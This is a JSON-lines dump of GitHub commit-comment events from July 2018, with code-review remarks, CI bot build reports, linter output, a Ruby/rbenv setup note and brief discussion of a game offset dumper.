{"id":"7964789812","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29706663,"position":null,"line":null,"path":null,"commit_id":"56f60c5792a4f5fda672bbbc725562ebc644cb33","created_at":"2018-07-13T23:31:21Z","updated_at":"2018-07-13T23:31:21Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-768](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-768).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-768-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T23:31:21Z"}
{"id":"7964793515","type":"CommitCommentEvent","actor":{"login":"andryyy"},"repo":{"name":"vstakhov/rspamd"},"payload":{"comment":{"id":29706668,"position":23,"line":446,"path":"src/plugins/lua/ratelimit.lua","commit_id":"ae7e9acf95f5e3d69b7048e1a46558cc979f0e03","created_at":"2018-07-13T23:33:07Z","updated_at":"2018-07-13T23:33:07Z","author_association":"CONTRIBUTOR","body":"Should be `pcall(hdl, task)`, I think. At least I cannot access task in hdl with this format."}},"created_at":"2018-07-13T23:33:07Z"}
{"id":"7964795867","type":"CommitCommentEvent","actor":{"login":"Tafsiu314"},"repo":{"name":"christopher-liang/surviv-bot"},"payload":{"comment":{"id":29706672,"position":null,"line":null,"path":null,"commit_id":"f155c437f68589c740d5d7d5f8210060edf74d8f","created_at":"2018-07-13T23:34:15Z","updated_at":"2018-07-13T23:34:15Z","author_association":"COLLABORATOR","body":"hai"}},"created_at":"2018-07-13T23:34:15Z"}
{"id":"7964796759","type":"CommitCommentEvent","actor":{"login":"novalic"},"repo":{"name":"novalic/rrsite"},"payload":{"comment":{"id":29706674,"position":null,"line":null,"path":null,"commit_id":"634540245231913d1a10d2401b6c42cba755d6fb","created_at":"2018-07-13T23:34:42Z","updated_at":"2018-07-13T23:34:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [0003 : Add documentation on how to run the app](https://trello.com/c/CcvBtf7w/3-0003-add-documentation-on-how-to-run-the-app)"}},"created_at":"2018-07-13T23:34:42Z"}
{"id":"7964797047","type":"CommitCommentEvent","actor":{"login":"aspedrosa"},"repo":{"name":"aspedrosa/expensesManager"},"payload":{"comment":{"id":29706675,"position":null,"line":null,"path":null,"commit_id":"3724c095fbf62ff863529d20422d39b423a61d24","created_at":"2018-07-13T23:34:49Z","updated_at":"2018-07-13T23:34:49Z","author_association":"OWNER","body":"I also implemented some methods to handle events. Mainly click on buttons and lists of items (expenses)."}},"created_at":"2018-07-13T23:34:49Z"}
{"id":"7964798552","type":"CommitCommentEvent","actor":{"login":"andryyy"},"repo":{"name":"vstakhov/rspamd"},"payload":{"comment":{"id":29706680,"position":26,"line":449,"path":"src/plugins/lua/ratelimit.lua","commit_id":"ae7e9acf95f5e3d69b7048e1a46558cc979f0e03","created_at":"2018-07-13T23:35:29Z","updated_at":"2018-07-13T23:35:29Z","author_association":"CONTRIBUTOR","body":"Can we have this check and convert from \"old\" format like \"1 / 1 h\"? 👍 \r\n\r\nI tried to use parse_limit, but then in line 498 it cannot find `value.bucket`, it is nil. `value.name` is set, though. "}},"created_at":"2018-07-13T23:35:29Z"}
{"id":"7964798988","type":"CommitCommentEvent","actor":{"login":"guillenvd"},"repo":{"name":"EmmanuelMrn/VieLyf"},"payload":{"comment":{"id":29706683,"position":67,"line":67,"path":"client/app/components/Agenda/Agenda.js","commit_id":"f0d5bde10c438f3cca543ae2f4a298f0c0487c24","created_at":"2018-07-13T23:35:42Z","updated_at":"2018-07-13T23:35:42Z","author_association":"COLLABORATOR","body":"Where is the definition of the JSON variable?, also its a Variable name reserved "}},"created_at":"2018-07-13T23:35:42Z"}
{"id":"7964803549","type":"CommitCommentEvent","actor":{"login":"guillenvd"},"repo":{"name":"EmmanuelMrn/VieLyf"},"payload":{"comment":{"id":29706699,"position":38,"line":38,"path":"client/app/components/Home/DisponibilitySchedule.js","commit_id":"f0d5bde10c438f3cca543ae2f4a298f0c0487c24","created_at":"2018-07-13T23:37:57Z","updated_at":"2018-07-13T23:37:57Z","author_association":"COLLABORATOR","body":"Please write all the text on English or Spanish not both languages at the same time."}},"created_at":"2018-07-13T23:37:57Z"}
{"id":"7964807015","type":"CommitCommentEvent","actor":{"login":"jlapeyre"},"repo":{"name":"jlapeyre/InverseLaplace.jl"},"payload":{"comment":{"id":29706703,"position":null,"line":null,"path":null,"commit_id":"9da744d80bdcfc6c86794d33fef4dd5aab22025f","created_at":"2018-07-13T23:39:34Z","updated_at":"2018-07-13T23:39:34Z","author_association":"OWNER","body":"Good. Make a PR if you like. If not, I'll get to it eventually."}},"created_at":"2018-07-13T23:39:34Z"}
{"id":"7964809945","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706708,"position":null,"line":null,"path":null,"commit_id":"c0ced0fa8515e0281476e31838684e4c8ab8c7e9","created_at":"2018-07-13T23:41:06Z","updated_at":"2018-07-13T23:41:06Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: OK (3312 of 3312 tests passed, 114 test warnings)\n\nMessages:\n\n * 97 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n * 16 tests had: Table small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c0ced0fa8515e0281476e31838684e4c8ab8c7e9-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c0ced0fa8515e0281476e31838684e4c8ab8c7e9-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T23:41:06Z"}
{"id":"7964812905","type":"CommitCommentEvent","actor":{"login":"guillenvd"},"repo":{"name":"EmmanuelMrn/VieLyf"},"payload":{"comment":{"id":29706720,"position":121,"line":121,"path":"client/app/components/Home/Signup.js","commit_id":"f0d5bde10c438f3cca543ae2f4a298f0c0487c24","created_at":"2018-07-13T23:42:29Z","updated_at":"2018-07-13T23:42:29Z","author_association":"COLLABORATOR","body":"this condition is used multiple times, you can create a helper class and put it on a method."}},"created_at":"2018-07-13T23:42:29Z"}
{"id":"7964813036","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29706721,"position":null,"line":null,"path":null,"commit_id":"e122d2365395caa84af8eadfe5c84f69133d7afc","created_at":"2018-07-13T23:42:33Z","updated_at":"2018-07-13T23:42:33Z","author_association":"COLLABORATOR","body":"- Everything from [build 18720](https://github.com/DJScias/Discord-Datamining/commit/2930586e06f90790de77b5fcf2e5b0f445e124e0) reverted\r\n\r\n## New strings\r\n- `ADD_FRIEND_SEARCH: \"Search\",\r\n- `ADD_FRIEND_NEARBY: \"Nearby\",\r\n- `ADD_FRIEND_FRIEND: \"Friend\",\r\n- `ADD_FRIEND_NEARBY_ENABLE: \"Enable Nearby in System Settings -> Google -> Nearby to find nearby friends nearby!\",\r\n- `ADD_FRIEND_NEARBY_LOOKING: \"Scanning the airwaves for future friends...\",\r\n- `ADD_FRIEND_NEARBY_STOPPED: \"Nearby connection was stopped.\",\r\n- `ADD_FRIEND_NEARBY_GOOGLE_PLAY_ERROR: \"There was a problem using Google Play Services. Please install and update Google Play Services to the latest version and try again.\",\r\n- `ADD_FRIEND_NEARBY_CONNECTION_ERROR: \"Please turn on location services, Bluetooth, and WiFi (all the things!). Then reconnect to the internet to activate Nearby.\",\r\n- `ADD_FRIEND_NEARBY_GENERIC_ERROR: \"There was a problem using Nearby. Please try again\","}},"created_at":"2018-07-13T23:42:33Z"}
{"id":"7964815248","type":"CommitCommentEvent","actor":{"login":"guillenvd"},"repo":{"name":"EmmanuelMrn/VieLyf"},"payload":{"comment":{"id":29706724,"position":25,"line":24,"path":"client/app/styles/styles.scss","commit_id":"f0d5bde10c438f3cca543ae2f4a298f0c0487c24","created_at":"2018-07-13T23:43:41Z","updated_at":"2018-07-13T23:43:41Z","author_association":"COLLABORATOR","body":"Please use a hex color or rgb, not both of them."}},"created_at":"2018-07-13T23:43:41Z"}
{"id":"7964815471","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706725,"position":null,"line":null,"path":null,"commit_id":"26f1e83eeeb323772e9f31bcda961d2f2af216e3","created_at":"2018-07-13T23:43:47Z","updated_at":"2018-07-13T23:43:47Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - i386-Windows-7-VisualStudio-14: OK (2937 of 2937 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T23:43:47Z"}
{"id":"7964818308","type":"CommitCommentEvent","actor":{"login":"TylerBurnett"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29706738,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-13T23:45:12Z","updated_at":"2018-07-13T23:45:12Z","author_association":"NONE","body":"@MikeLund uhhhnot to be a dick dude, but if their sig scanning patterns weren’t able to get the correct offsets from their dumper why would you expect him to be able to be the correct offsets from sig scanning? Seems to be a major code restructure. And I feel this may leave offsets broken for a while until new patterns are manually found "}},"created_at":"2018-07-13T23:45:12Z"}
{"id":"7964819017","type":"CommitCommentEvent","actor":{"login":"guillenvd"},"repo":{"name":"EmmanuelMrn/VieLyf"},"payload":{"comment":{"id":29706743,"position":18,"line":11,"path":"client/app/utils/storage.js","commit_id":"f0d5bde10c438f3cca543ae2f4a298f0c0487c24","created_at":"2018-07-13T23:45:32Z","updated_at":"2018-07-13T23:45:32Z","author_association":"COLLABORATOR","body":"why are two return null at the same scope ?"}},"created_at":"2018-07-13T23:45:32Z"}
{"id":"7964819816","type":"CommitCommentEvent","actor":{"login":"guillenvd"},"repo":{"name":"EmmanuelMrn/VieLyf"},"payload":{"comment":{"id":29706746,"position":23,"line":14,"path":"client/app/utils/storage.js","commit_id":"f0d5bde10c438f3cca543ae2f4a298f0c0487c24","created_at":"2018-07-13T23:45:57Z","updated_at":"2018-07-13T23:45:57Z","author_association":"COLLABORATOR","body":"it mus be a return here"}},"created_at":"2018-07-13T23:45:57Z"}
{"id":"7964823256","type":"CommitCommentEvent","actor":{"login":"TylerBurnett"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29706757,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-13T23:47:43Z","updated_at":"2018-07-13T23:47:43Z","author_association":"NONE","body":"Also @MemZ14 cmon man, it must be obvious that the offsets ain’t working bro, I commented about it other people have commented about it. It’s not your code, it’s just cs:go must of changed up their codebase substantially enough that patterns need to be found again"}},"created_at":"2018-07-13T23:47:43Z"}
{"id":"7964824041","type":"CommitCommentEvent","actor":{"login":"guillenvd"},"repo":{"name":"EmmanuelMrn/VieLyf"},"payload":{"comment":{"id":29706758,"position":42,"line":28,"path":"server/models/User.js","commit_id":"f0d5bde10c438f3cca543ae2f4a298f0c0487c24","created_at":"2018-07-13T23:48:07Z","updated_at":"2018-07-13T23:48:07Z","author_association":"COLLABORATOR","body":"If this is not longer necessary please remove it."}},"created_at":"2018-07-13T23:48:07Z"}
{"id":"7964825349","type":"CommitCommentEvent","actor":{"login":"madeye"},"repo":{"name":"Mygod/VPNHotspot"},"payload":{"comment":{"id":29706762,"position":null,"line":null,"path":null,"commit_id":"33cd906f6559b802f200804b4d7812cb144e5d68","created_at":"2018-07-13T23:48:45Z","updated_at":"2018-07-13T23:48:45Z","author_association":"NONE","body":"The only reason I added AD for default profile is to cover the public server cost.\r\n\r\nGiven shadowsocks is developed by a community now, it's hard to add a donation link for me only.\r\n\r\nBTW, I'm glad to add a recommendation link to this useful app in shadowsocks.\r\n\r\nAny suggestion?"}},"created_at":"2018-07-13T23:48:45Z"}
{"id":"7964825692","type":"CommitCommentEvent","actor":{"login":"jimmuell"},"repo":{"name":"jimmuell/test"},"payload":{"comment":{"id":29706763,"position":null,"line":null,"path":null,"commit_id":"2f577b32fc89d1bbd400eebe3ba11dc191e19542","created_at":"2018-07-13T23:48:57Z","updated_at":"2018-07-13T23:48:57Z","author_association":"OWNER","body":"dddd"}},"created_at":"2018-07-13T23:48:57Z"}
{"id":"7964826448","type":"CommitCommentEvent","actor":{"login":"jacobwilliamroy"},"repo":{"name":"chalmerlowe/jarvis_II"},"payload":{"comment":{"id":29706765,"position":null,"line":null,"path":null,"commit_id":"0a6f70432ed50376cea4842cf51ff8c2f663d517","created_at":"2018-07-13T23:49:21Z","updated_at":"2018-07-13T23:49:21Z","author_association":"NONE","body":"I noticed the following code:\r\n```\r\ndef generic(n=6):\r\n    '''Return a random sequence of n numbers.\r\n    '''\r\n    return [randint(0, 9) for digit in range(n)]\r\n```\r\nSo RSA tokens are stringy/listy-things, not integers, and tokens are allowed to have leading 0s?"}},"created_at":"2018-07-13T23:49:21Z"}
{"id":"7964831265","type":"CommitCommentEvent","actor":{"login":"guillenvd"},"repo":{"name":"EmmanuelMrn/VieLyf"},"payload":{"comment":{"id":29706782,"position":26,"line":118,"path":"client/app/components/Home/Login.js","commit_id":"ee551c4b27d45b6c9eabc5a85f9a7868023682a8","created_at":"2018-07-13T23:51:56Z","updated_at":"2018-07-13T23:51:56Z","author_association":"COLLABORATOR","body":"Instead of this please use history.push('/users');"}},"created_at":"2018-07-13T23:51:56Z"}
{"id":"7964834035","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29706790,"position":null,"line":null,"path":null,"commit_id":"d1bbbb8716b67268405fc3660e2b536381c30b53","created_at":"2018-07-13T23:53:23Z","updated_at":"2018-07-13T23:53:23Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-128](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-128).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-128-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-13T23:53:23Z"}
{"id":"7964838788","type":"CommitCommentEvent","actor":{"login":"medeiva"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29706802,"position":6,"line":6,"path":"lesson4/route.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T23:55:52Z","updated_at":"2018-07-13T23:55:52Z","author_association":"OWNER","body":"я жутко туплю и не понимаю)\r\nвот ты пишешь Ну нужно делать инстэнс переменные из того, что можно вычислить из других инстэнс переменных. Сделай отдельные методы для start_station и end_station.\r\nможешь показать тогда как должна выглядить инициализация, если у меня есть отдельные методы \r\n\r\n"}},"created_at":"2018-07-13T23:55:52Z"}
{"id":"7964843089","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29706808,"position":null,"line":null,"path":null,"commit_id":"9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff","created_at":"2018-07-13T23:58:05Z","updated_at":"2018-07-13T23:58:05Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9c013b5eb2a0a637e60f65c74c80ffe4c66d66ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-13T23:58:05Z"}
{"id":"7964845247","type":"CommitCommentEvent","actor":{"login":"2To3rdPwr"},"repo":{"name":"2To3rdPwr/COP4710"},"payload":{"comment":{"id":29706815,"position":null,"line":null,"path":null,"commit_id":"39f263272e08b4183aad1d07d4ead3a6015e3fb4","created_at":"2018-07-13T23:59:05Z","updated_at":"2018-07-13T23:59:05Z","author_association":"OWNER","body":"Updated registration to work with the database we are using"}},"created_at":"2018-07-13T23:59:05Z"}
{"id":"7959768083","type":"CommitCommentEvent","actor":{"login":"1564945782"},"repo":{"name":"1564945782/HTML5StudyCode"},"payload":{"comment":{"id":29694059,"position":2,"line":2,"path":"README.md","commit_id":"c30f5cd121dc46bad4c9a8f7b9f9937081ed901b","created_at":"2018-07-13T03:00:43Z","updated_at":"2018-07-13T03:00:43Z","author_association":"OWNER","body":"git 学习"}},"created_at":"2018-07-13T03:00:43Z"}
{"id":"7959768554","type":"CommitCommentEvent","actor":{"login":"YOOOOOOOOOlaf"},"repo":{"name":"YOOOOOOOOOlaf/Mytest"},"payload":{"comment":{"id":29694062,"position":null,"line":null,"path":null,"commit_id":"fcdee8e962d8dc0fcb3f733ed204908acb2270ff","created_at":"2018-07-13T03:00:54Z","updated_at":"2018-07-13T03:00:54Z","author_association":"OWNER","body":"// - - - - - - - - - Problem shotting: 您對/var/lib/gems/2.3.0目錄沒有寫入權限\r\n//卸載由Ubuntu安裝的ruby\r\n$ sudo apt-get remove ruby\r\n\r\n// 使用rbenv和ruby-build重新安裝ruby\r\n$ cd $HOME\r\n$ sudo apt-get update \r\n$ sudo apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev\r\n\r\n$ git clone https://github.com/rbenv/rbenv.git ~/.rbenv\r\n$ echo 'export PATH=\"$HOME/.rbenv/bin:$PATH\"' >> ~/.bashrc\r\n$ echo 'eval \"$(rbenv init -)\"' >> ~/.bashrc\r\n$ exec $SHELL\r\n\r\n$ git clone https://github.com/rbenv/ruby-build.git ~/.rbenv/plugins/ruby-build\r\n$ echo 'export PATH=\"$HOME/.rbenv/plugins/ruby-build/bin:$PATH\"' >> ~/.bashrc\r\n$ exec $SHELL\r\n\r\n$ rbenv install 2.5.1\r\n$ rbenv global 2.5.1\r\n$ ruby -v\r\n\r\n// 安裝Bundler\r\n$ gem install bundler\r\n$ rbenv rehash\r\n\r\n// - - - - - - - - - Problem shotting: \r\nyo@yo-VirtualBox:~/Sites/jobsboard$ rake db:migrate\r\n/home/yo/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activesupport-4.2.6/lib/active_support/core_ext/numeric/conversions.rb:121: warning: constant ::Fixnum is deprecated\r\n/home/yo/.rbenv/versions/2.5.1/lib/ruby/gems/2.5.0/gems/activesupport-4.2.6/lib/active_support/core_ext/numeric/conversions.rb:121: warning: constant ::Bignum is deprecated\r\nrake aborted!\r\nSystemStackError: stack level too deep\r\n/home/yo/Sites/jobsboard/config/environment.rb:5:in `<top (required)>'\r\nTasks: TOP => db:migrate => environment\r\n(See full trace by running task with --trace)\r\n\r\n// upgrade form Rails 4.2 to Rails 5.0 (Rails 5 now requires Ruby 2.2.2 or greater)\r\n\r\n// 1 - update ruby\r\n$ rbenv install 2.5.1\r\n$ rvm install 2.5.1\r\n\r\n// 2 - update gem dependencies to Rails 5\r\n// Gemfile\r\ngem 'rails', '>= 5.0.0.rc2', '< 5.2'\r\n// upeate Rails dependencies\r\n$ bundle updata rails\r\n\r\n// 3 - update Rails banaries and configurations\r\n$ rails app:update\r\n\r\n// 4 - generate the db/schema.rb file again\r\n$ rails db:migrate\r\n\r\n\r\n// - - - - - - - - - Problem shotting: \r\ngit push -u origin master\r\nerror: src refspec master does not match any. \r\nerror: failed to push some refs to \"*********\"\r\n\r\ngit add .\r\ngit commit -m \"write your meaaage\"\r\ngit push -u origin master"}},"created_at":"2018-07-13T03:00:54Z"}
{"id":"7959768686","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29694064,"position":1,"line":null,"path":"1531450854.52/github_test.txt","commit_id":"60773d5ae0ae9f6da1f69955ddd9431cc92cede3","created_at":"2018-07-13T03:00:57Z","updated_at":"2018-07-13T03:00:57Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-13T03:00:57Z"}
{"id":"7959770051","type":"CommitCommentEvent","actor":{"login":"1564945782"},"repo":{"name":"1564945782/HTML5StudyCode"},"payload":{"comment":{"id":29694069,"position":2,"line":2,"path":"README.md","commit_id":"c30f5cd121dc46bad4c9a8f7b9f9937081ed901b","created_at":"2018-07-13T03:01:27Z","updated_at":"2018-07-13T03:01:27Z","author_association":"OWNER","body":"study hard"}},"created_at":"2018-07-13T03:01:27Z"}
{"id":"7959772364","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29694080,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-13T03:02:24Z","updated_at":"2018-07-13T03:02:24Z","author_association":"NONE","body":"update-libraries (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-13T03:02:24Z"}
{"id":"7959773773","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"felixonmars/dnsmasq-china-list"},"payload":{"comment":{"id":29694090,"position":4,"line":2939,"path":"accelerated-domains.china.conf","commit_id":"f0a238568273d7f9039eebc9ca303b2db5588de4","created_at":"2018-07-13T03:02:59Z","updated_at":"2018-07-13T03:02:59Z","author_association":"NONE","body":"请问这里问什么不是 `/114.114.114.114` ?"}},"created_at":"2018-07-13T03:02:59Z"}
{"id":"7959786805","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29694127,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T03:08:24Z","updated_at":"2018-07-13T03:08:24Z","author_association":"NONE","body":"I am curious what would happen if you just took the tuned values that are large, say the largest 40 values, and left all the rest as they were.  I would think that larger value variables would be more volatile and thus would be more likely to be tuned well after those 2m games.  The smaller stuff can move off optimum with only a small cost to each but cumulatively could drag down the whole tuning run.  Just a hypotheses."}},"created_at":"2018-07-13T03:08:24Z"}
{"id":"7959790539","type":"CommitCommentEvent","actor":{"login":"tranguyen123"},"repo":{"name":"UCBX-Project1/APIProject"},"payload":{"comment":{"id":29694132,"position":null,"line":null,"path":null,"commit_id":"40e01fb8cccdb367a5db2d161cf8c4c86416f583","created_at":"2018-07-13T03:10:01Z","updated_at":"2018-07-13T03:10:01Z","author_association":"COLLABORATOR","body":"good job!"}},"created_at":"2018-07-13T03:10:01Z"}
{"id":"7959790540","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29694133,"position":null,"line":null,"path":null,"commit_id":"4410038e0a2750e61a0a5c0f73e1730830469d6d","created_at":"2018-07-13T03:10:01Z","updated_at":"2018-07-13T03:10:01Z","author_association":"NONE","body":"[R/sankey_drake_graph.R:144:1:](https://github.com/ropensci/drake/blob/4410038e0a2750e61a0a5c0f73e1730830469d6d/R/sankey_drake_graph.R#L144) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/sankey_drake_graph.R:146:1:](https://github.com/ropensci/drake/blob/4410038e0a2750e61a0a5c0f73e1730830469d6d/R/sankey_drake_graph.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2018-07-13T03:10:01Z"}
{"id":"7959800255","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29694152,"position":null,"line":null,"path":null,"commit_id":"0e0b9ad5457f0c5674c69a57e859a241a6c86f49","created_at":"2018-07-13T03:13:57Z","updated_at":"2018-07-13T03:13:57Z","author_association":"OWNER","body":"fixes #7 "}},"created_at":"2018-07-13T03:13:57Z"}
{"id":"7959804602","type":"CommitCommentEvent","actor":{"login":"nickersk"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":29694160,"position":null,"line":null,"path":null,"commit_id":"226d1cd9258d7386fc7d20dff3a81f21a6526b99","created_at":"2018-07-13T03:15:44Z","updated_at":"2018-07-13T03:15:44Z","author_association":"NONE","body":"which machine?"}},"created_at":"2018-07-13T03:15:44Z"}
{"id":"7959805789","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29694162,"position":null,"line":null,"path":null,"commit_id":"96aca6d7e6dc3c05d761098a19f96b82d2783b1c","created_at":"2018-07-13T03:16:14Z","updated_at":"2018-07-13T03:16:14Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/question-answer-plugin/56032/119\n"}},"created_at":"2018-07-13T03:16:14Z"}
{"id":"7959805805","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29694163,"position":null,"line":null,"path":null,"commit_id":"b49c662aa4724b4761927a7ceb31bcda35f9880a","created_at":"2018-07-13T03:16:14Z","updated_at":"2018-07-13T03:16:14Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/question-answer-plugin/56032/119\n"}},"created_at":"2018-07-13T03:16:14Z"}
{"id":"7959807523","type":"CommitCommentEvent","actor":{"login":"Sharkzh"},"repo":{"name":"Sharkzh/test-repo"},"payload":{"comment":{"id":29694166,"position":null,"line":null,"path":null,"commit_id":"e716f2bbdc97f335bf74f7b6ae81ae1c1a418682","created_at":"2018-07-13T03:16:55Z","updated_at":"2018-07-13T03:16:55Z","author_association":"OWNER","body":"##haha"}},"created_at":"2018-07-13T03:16:55Z"}
{"id":"7959809351","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29694169,"position":null,"line":null,"path":null,"commit_id":"f12a258b124882a7103df0180ea20244fe31fb50","created_at":"2018-07-13T03:17:40Z","updated_at":"2018-07-13T03:17:40Z","author_association":"NONE","body":"[R/sankey_drake_graph.R:144:1:](https://github.com/ropensci/drake/blob/f12a258b124882a7103df0180ea20244fe31fb50/R/sankey_drake_graph.R#L144) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/sankey_drake_graph.R:146:1:](https://github.com/ropensci/drake/blob/f12a258b124882a7103df0180ea20244fe31fb50/R/sankey_drake_graph.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2018-07-13T03:17:40Z"}
{"id":"7959814203","type":"CommitCommentEvent","actor":{"login":"choosei"},"repo":{"name":"choosei/cssComponentback_zx"},"payload":{"comment":{"id":29694177,"position":null,"line":null,"path":null,"commit_id":"2517ae14e1ee12816119e55a5b7f01a91773be7b","created_at":"2018-07-13T03:19:44Z","updated_at":"2018-07-13T03:19:44Z","author_association":"OWNER","body":"1111"}},"created_at":"2018-07-13T03:19:44Z"}
